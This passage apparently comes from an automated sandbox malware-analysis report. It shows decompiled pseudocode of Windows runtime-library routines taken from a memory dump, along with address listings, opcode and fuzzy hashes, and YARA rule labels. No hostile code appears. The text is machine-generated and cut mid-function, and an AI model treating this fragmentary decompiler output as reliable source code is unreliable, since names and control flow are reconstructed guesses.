										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E00AE7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E00B47016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E00B5FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0xbb5350;
							if(_t109 != 0xbb5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E00B5FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E00B55720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                                                                        0x00ac2d8a
                                                                                                        0x00ac2d8a
                                                                                                        0x00ac2d92
                                                                                                        0x00ac2d96
                                                                                                        0x00ac2d9e
                                                                                                        0x00ac2da0
                                                                                                        0x00ac2da3
                                                                                                        0x00ac2da5
                                                                                                        0x00ac2da8
                                                                                                        0x00ac2dab
                                                                                                        0x00ac2db2
                                                                                                        0x00b1f9aa
                                                                                                        0x00b1f9ab
                                                                                                        0x00b1f9ae
                                                                                                        0x00b1f9ae
                                                                                                        0x00ac2db8
                                                                                                        0x00ac2dc2
                                                                                                        0x00b1f9b9
                                                                                                        0x00b1f9be
                                                                                                        0x00b1f9bf
                                                                                                        0x00b1f9bf
                                                                                                        0x00ac2dcf
                                                                                                        0x00b1f9c9
                                                                                                        0x00ac2dd5
                                                                                                        0x00ac2dd5
                                                                                                        0x00ac2dd5
                                                                                                        0x00ac2dde
                                                                                                        0x00ac2de1
                                                                                                        0x00ac2e70
                                                                                                        0x00ac2e72
                                                                                                        0x00ac2e72
                                                                                                        0x00ac2de7
                                                                                                        0x00ac2deb
                                                                                                        0x00ac2e7c
                                                                                                        0x00ac2e83
                                                                                                        0x00ac2e85
                                                                                                        0x00ac2e8b
                                                                                                        0x00ac2e8d
                                                                                                        0x00ac2e92
                                                                                                        0x00ac2e92
                                                                                                        0x00ac2e85
                                                                                                        0x00ac2df1
                                                                                                        0x00ac2df7
                                                                                                        0x00ac2df9
                                                                                                        0x00ac2df9
                                                                                                        0x00ac2dfc
                                                                                                        0x00ac2dff
                                                                                                        0x00ac2e02
                                                                                                        0x00000000
                                                                                                        0x00ac2e05
                                                                                                        0x00ac2e0c
                                                                                                        0x00b1f9d9
                                                                                                        0x00ac2e12
                                                                                                        0x00ac2e12
                                                                                                        0x00ac2e12
                                                                                                        0x00ac2e1a
                                                                                                        0x00b1f9e3
                                                                                                        0x00b1f9e9
                                                                                                        0x00b1f9f0
                                                                                                        0x00b1f9f6
                                                                                                        0x00b1f9f8
                                                                                                        0x00b1f9f8
                                                                                                        0x00b1f9f0
                                                                                                        0x00ac2e23
                                                                                                        0x00b1fa02
                                                                                                        0x00b1fa03
                                                                                                        0x00b1fa05
                                                                                                        0x00b1fa06
                                                                                                        0x00000000
                                                                                                        0x00ac2e29
                                                                                                        0x00ac2e29
                                                                                                        0x00ac2e2e
                                                                                                        0x00ac2e34
                                                                                                        0x00ac2e3e
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ac2e44
                                                                                                        0x00ac2e47
                                                                                                        0x00ac2e4d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ac2e4f
                                                                                                        0x00ac2e54
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00ac2e5a
                                                                                                        0x00ac2e5f
                                                                                                        0x00ac2e9a
                                                                                                        0x00ac2ea4
                                                                                                        0x00ac2ea5
                                                                                                        0x00ac2ea8
                                                                                                        0x00ac2eaf
                                                                                                        0x00ac2eb2
                                                                                                        0x00ac2eb5
                                                                                                        0x00b1fae9
                                                                                                        0x00b1faeb
                                                                                                        0x00b1faed
                                                                                                        0x00b1faef
                                                                                                        0x00b1faf7
                                                                                                        0x00b1faf8
                                                                                                        0x00b1fafd
                                                                                                        0x00b1faff
                                                                                                        0x00b1fb04
                                                                                                        0x00b1fb04
                                                                                                        0x00b1faff
                                                                                                        0x00ac2ec0
                                                                                                        0x00ac2ec4
                                                                                                        0x00ac2ec6
                                                                                                        0x00ac2ec8
                                                                                                        0x00b1fb14
                                                                                                        0x00b1fb18
                                                                                                        0x00b1fb1e
                                                                                                        0x00b1fb21
                                                                                                        0x00b1fb21
                                                                                                        0x00ac2ece
                                                                                                        0x00ac2ece
                                                                                                        0x00ac2ece
                                                                                                        0x00ac2ed7
                                                                                                        0x00ac2e61
                                                                                                        0x00ac2e63
                                                                                                        0x00b1fa6b
                                                                                                        0x00b1fa71
                                                                                                        0x00b1fa76
                                                                                                        0x00b1fa78
                                                                                                        0x00b1fa8a
                                                                                                        0x00b1fa7a
                                                                                                        0x00b1fa83
                                                                                                        0x00b1fa83
                                                                                                        0x00b1fa8f
                                                                                                        0x00b1fa91
                                                                                                        0x00b1fa97
                                                                                                        0x00b1fa9d
                                                                                                        0x00b1faa4
                                                                                                        0x00b1faaa
                                                                                                        0x00b1faaf
                                                                                                        0x00b1fab1
                                                                                                        0x00b1fac3
                                                                                                        0x00b1fab3
                                                                                                        0x00b1fabc
                                                                                                        0x00b1fabc
                                                                                                        0x00b1fac8
                                                                                                        0x00b1facb
                                                                                                        0x00b1fadf
                                                                                                        0x00b1fadf
                                                                                                        0x00b1facb
                                                                                                        0x00b1faa4
                                                                                                        0x00b1fa91
                                                                                                        0x00ac2e6f
                                                                                                        0x00ac2e6f
                                                                                                        0x00ac2e5f
                                                                                                        0x00b1fa13
                                                                                                        0x00b1fa15
                                                                                                        0x00b1fa17
                                                                                                        0x00b1fa1f
                                                                                                        0x00b1fa21
                                                                                                        0x00b1fa22
                                                                                                        0x00b1fa25
                                                                                                        0x00b1fa28
                                                                                                        0x00b1fa2f
                                                                                                        0x00b1fa2f
                                                                                                        0x00b1fa2a
                                                                                                        0x00b1fa2a
                                                                                                        0x00b1fa2a
                                                                                                        0x00b1fa31
                                                                                                        0x00b1fa34
                                                                                                        0x00b1fa36
                                                                                                        0x00b1fa3c
                                                                                                        0x00b1fa3e
                                                                                                        0x00b1fa41
                                                                                                        0x00b1fa43
                                                                                                        0x00b1fa45
                                                                                                        0x00b1fa45
                                                                                                        0x00b1fa41
                                                                                                        0x00b1fa3c
                                                                                                        0x00b1fa4a
                                                                                                        0x00b1fa4f
                                                                                                        0x00b1fa51
                                                                                                        0x00b1fa53
                                                                                                        0x00b1fa56
                                                                                                        0x00b1fa5b
                                                                                                        0x00b1fa5e
                                                                                                        0x00000000
                                                                                                        0x00b1fa5e
                                                                                                        0x00ac2e23

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Re-Waiting
                                                                                                        • API String ID: 0-316354757
                                                                                                        • Opcode ID: 59d7478fcdab1d262ad14c7e803926005bbf7f028610daaf25835cd4b7714ce8
                                                                                                        • Instruction ID: 4bde45bb17b4b0c8266253ad8a4a5e829a392ab006d3772ae6e6f3b7ecd59e1a
                                                                                                        • Opcode Fuzzy Hash: 59d7478fcdab1d262ad14c7e803926005bbf7f028610daaf25835cd4b7714ce8
                                                                                                        • Instruction Fuzzy Hash: 48610431A00645ABDB22DB68C880BBEBBF5EF44750F2506B9E815A72D1CB789D81C791
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B90EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 80%
                                                                                                        			E00B90EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E00B8FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E00B91074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E00B09730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E00B8A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E00B8A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0xbb8b04 >> 0x14) + (_v44 -  *0xbb8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E00AE7D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E00B8138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E00AE7D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E00B7FEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0xbb8724 & 0x00000008) != 0) {
						E00B852F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E00B915B5(0xbb8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                                                                        0x00b90eb7
                                                                                                        0x00b90eb9
                                                                                                        0x00b90ec0
                                                                                                        0x00b90ec2
                                                                                                        0x00b90ecd
                                                                                                        0x00b9105b
                                                                                                        0x00b9105b
                                                                                                        0x00b91061
                                                                                                        0x00b91066
                                                                                                        0x00b91066
                                                                                                        0x00b9106b
                                                                                                        0x00b91073
                                                                                                        0x00b91073
                                                                                                        0x00b90ed3
                                                                                                        0x00b90ed6
                                                                                                        0x00b90edc
                                                                                                        0x00b90ee0
                                                                                                        0x00b90ee7
                                                                                                        0x00b90ef0
                                                                                                        0x00b90ef5
                                                                                                        0x00b90efa
                                                                                                        0x00b90efc
                                                                                                        0x00b90efd
                                                                                                        0x00b90f03
                                                                                                        0x00b90f04
                                                                                                        0x00b90f06
                                                                                                        0x00b90f07
                                                                                                        0x00b90f09
                                                                                                        0x00b90f0e
                                                                                                        0x00b90f14
                                                                                                        0x00b90f23
                                                                                                        0x00b90f2d
                                                                                                        0x00b90f34
                                                                                                        0x00b90f34
                                                                                                        0x00b90f14
                                                                                                        0x00b90f52
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b90f58
                                                                                                        0x00b90f73
                                                                                                        0x00b90f74
                                                                                                        0x00b90f79
                                                                                                        0x00b90f7d
                                                                                                        0x00b90f80
                                                                                                        0x00b90f86
                                                                                                        0x00b90fab
                                                                                                        0x00b90fb5
                                                                                                        0x00b90fc6
                                                                                                        0x00b90fd1
                                                                                                        0x00b90fe3
                                                                                                        0x00b90fd3
                                                                                                        0x00b90fdc
                                                                                                        0x00b90fdc
                                                                                                        0x00b90feb
                                                                                                        0x00b91009
                                                                                                        0x00b91009
                                                                                                        0x00b91015
                                                                                                        0x00b91027
                                                                                                        0x00b91017
                                                                                                        0x00b91020
                                                                                                        0x00b91020
                                                                                                        0x00b9102f
                                                                                                        0x00b9103c
                                                                                                        0x00b9103c
                                                                                                        0x00b91048
                                                                                                        0x00b91050
                                                                                                        0x00b91050
                                                                                                        0x00b91055
                                                                                                        0x00000000
                                                                                                        0x00b91055
                                                                                                        0x00b90f88
                                                                                                        0x00b90f9e
                                                                                                        0x00b90fa2
                                                                                                        0x00b90fa9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b90fa9
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: `
                                                                                                        • API String ID: 0-2679148245
                                                                                                        • Opcode ID: 57d112632a28e2cafb13793d74f4f1c902082c976b92d72f39258c3857b607ce
                                                                                                        • Instruction ID: e39e8a114585a7b74f76b6bac21a7c73cb9432b5b62917fdf55d9a0ef0f7d318
                                                                                                        • Opcode Fuzzy Hash: 57d112632a28e2cafb13793d74f4f1c902082c976b92d72f39258c3857b607ce
                                                                                                        • Instruction Fuzzy Hash: 7D51D0712043429FDB24EF28D881B2BB7E9EBC4304F040ABCF98687291D671ED45CB62
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00AFF0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00AFF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E00AE4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E00B09830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E00B09990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E00B095D0();
							goto L11;
						} else {
							_t109 = L00AE4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E00B0F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E00B095D0();
										L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                                                                        0x00aff0d3
                                                                                                        0x00aff0d9
                                                                                                        0x00aff0e0
                                                                                                        0x00aff0e7
                                                                                                        0x00aff0f2
                                                                                                        0x00aff0f4
                                                                                                        0x00aff0f8
                                                                                                        0x00aff100
                                                                                                        0x00aff108
                                                                                                        0x00aff10d
                                                                                                        0x00aff115
                                                                                                        0x00aff116
                                                                                                        0x00aff11f
                                                                                                        0x00aff123
                                                                                                        0x00aff124
                                                                                                        0x00aff12c
                                                                                                        0x00aff130
                                                                                                        0x00aff134
                                                                                                        0x00aff13d
                                                                                                        0x00aff144
                                                                                                        0x00aff14b
                                                                                                        0x00aff152
                                                                                                        0x00b3bab0
                                                                                                        0x00b3bab0
                                                                                                        0x00aff158
                                                                                                        0x00aff158
                                                                                                        0x00aff15a
                                                                                                        0x00aff160
                                                                                                        0x00aff165
                                                                                                        0x00aff166
                                                                                                        0x00aff16f
                                                                                                        0x00aff173
                                                                                                        0x00b3baa7
                                                                                                        0x00b3baa7
                                                                                                        0x00b3baab
                                                                                                        0x00000000
                                                                                                        0x00aff179
                                                                                                        0x00aff18d
                                                                                                        0x00aff191
                                                                                                        0x00b3baa2
                                                                                                        0x00000000
                                                                                                        0x00aff197
                                                                                                        0x00aff19b
                                                                                                        0x00aff1a2
                                                                                                        0x00aff1a9
                                                                                                        0x00aff1af
                                                                                                        0x00aff1b2
                                                                                                        0x00aff1b6
                                                                                                        0x00aff1b9
                                                                                                        0x00aff1c4
                                                                                                        0x00aff1d8
                                                                                                        0x00aff1df
                                                                                                        0x00aff1e3
                                                                                                        0x00aff1eb
                                                                                                        0x00aff1ee
                                                                                                        0x00aff1f4
                                                                                                        0x00aff20f
                                                                                                        0x00b3bab7
                                                                                                        0x00b3babb
                                                                                                        0x00b3bacc
                                                                                                        0x00b3bad1
                                                                                                        0x00aff215
                                                                                                        0x00aff218
                                                                                                        0x00aff226
                                                                                                        0x00aff22b
                                                                                                        0x00000000
                                                                                                        0x00aff22b
                                                                                                        0x00aff1f6
                                                                                                        0x00aff1f6
                                                                                                        0x00aff1f9
                                                                                                        0x00aff1fb
                                                                                                        0x00aff1fb
                                                                                                        0x00aff1f4
                                                                                                        0x00aff191
                                                                                                        0x00aff173
                                                                                                        0x00aff152
                                                                                                        0x00aff203

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: @
                                                                                                        • API String ID: 0-2766056989
                                                                                                        • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                        • Instruction ID: b07afbd6bed1d2933983199cef0e0289be4d5c66182b6e31d940a1ce5f5f9fbd
                                                                                                        • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                                                                        • Instruction Fuzzy Hash: E8518B71504714AFC321DF69C841A6BBBF8FF48710F108A2EFA9587691EBB4E914CB91
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B43540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 75%
                                                                                                        			E00B43540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0xbbd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E00B00BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E00B43706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E00B0FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E00B43540;
						E00B0FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E00B1DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E00B50C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E00B097C0();
					}
					return E00B0B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E00B43971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E00B43884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E00B0FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E00B09650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E00B43787(_a4,  &_v352, _t80);
						}
					}
					L00AE77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E00B095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                                                                        0x00b43552
                                                                                                        0x00b4355a
                                                                                                        0x00b4355d
                                                                                                        0x00b43566
                                                                                                        0x00b43567
                                                                                                        0x00b4357e
                                                                                                        0x00b4358f
                                                                                                        0x00b435a1
                                                                                                        0x00b435a5
                                                                                                        0x00b4366b
                                                                                                        0x00b4366b
                                                                                                        0x00b4366d
                                                                                                        0x00b43672
                                                                                                        0x00b43679
                                                                                                        0x00b43685
                                                                                                        0x00b4368d
                                                                                                        0x00b4369d
                                                                                                        0x00b436a7
                                                                                                        0x00b436b8
                                                                                                        0x00b436c6
                                                                                                        0x00b436c7
                                                                                                        0x00b436dc
                                                                                                        0x00b436e1
                                                                                                        0x00b436e7
                                                                                                        0x00b436e9
                                                                                                        0x00b436e9
                                                                                                        0x00b43703
                                                                                                        0x00b43703
                                                                                                        0x00b435b5
                                                                                                        0x00b435c0
                                                                                                        0x00b435c4
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b435ca
                                                                                                        0x00b435d7
                                                                                                        0x00b435e2
                                                                                                        0x00b435e6
                                                                                                        0x00b435e8
                                                                                                        0x00b435f5
                                                                                                        0x00b435fa
                                                                                                        0x00b43603
                                                                                                        0x00b43604
                                                                                                        0x00b43609
                                                                                                        0x00b4360a
                                                                                                        0x00b43612
                                                                                                        0x00b43613
                                                                                                        0x00b4361e
                                                                                                        0x00b43622
                                                                                                        0x00b43628
                                                                                                        0x00b4362f
                                                                                                        0x00b4362f
                                                                                                        0x00b43636
                                                                                                        0x00b43638
                                                                                                        0x00b4363b
                                                                                                        0x00b43642
                                                                                                        0x00b43642
                                                                                                        0x00b43636
                                                                                                        0x00b43657
                                                                                                        0x00b43657
                                                                                                        0x00b4365c
                                                                                                        0x00b43662
                                                                                                        0x00b43669
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000001.00000002.266159838.0000000000AA0000.00000040.00000001.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: BinaryHash
                                                                                                        • API String ID: 0-2202222882
                                                                                                        • Opcode ID: 1c97fb3ab8be61c0f092a4f30420f8ca0d3844d14b915d09b8d288d8d2016b59
                                                                                                        • Instruction ID: 64155a79d88172ae79db78da332b0e49a80321ad1e355dc133bf9df72bbed0ee
                                                                                                        • Opcode Fuzzy Hash: 1c97fb3ab8be61c0f092a4f30420f8ca0d3844d14b915d09b8d288d8d2016b59
                                                                                                        • Instruction Fuzzy Hash: CE4163B2D0052DABDF219A50DC81FEEB7FCAB44714F0545E5AA09A7281DB309F888F94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00B905AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 71%
                                                                                                        			E00B905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E00B907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E00B09730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E00B8A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E00B8A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E00B91293(_t79, _v40, E00B907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E00AE7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E00B8138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                                                                        0x00b905c5
                                                                                                        0x00b905ca
                                                                                                        0x00b905d3
                                                                                                        0x00b906db
                                                                                                        0x00b906db
                                                                                                        0x00b906dd
                                                                                                        0x00b906e3
                                                                                                        0x00b906e3
                                                                                                        0x00b905dd
                                                                                                        0x00b905e7
                                                                                                        0x00b905f6
                                                                                                        0x00b90600
                                                                                                        0x00b90607
                                                                                                        0x00b90610
                                                                                                        0x00b90615
                                                                                                        0x00b9061a
                                                                                                        0x00b9061c
                                                                                                        0x00b9061e
                                                                                                        0x00b90624
                                                                                                        0x00b90625
                                                                                                        0x00b90627
                                                                                                        0x00b90628
                                                                                                        0x00b90631
                                                                                                        0x00b90640
                                                                                                        0x00b9064d
                                                                                                        0x00b90654
                                                                                                        0x00b90654
                                                                                                        0x00b90631
                                                                                                        0x00b9066d
                                                                                                        0x00b90674
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00b90692
                                                                                                        0x00b9069e
                                                                                                        0x00b906b0
                                                                                                        0x00b906a0
                                                                                                        0x00b906a9
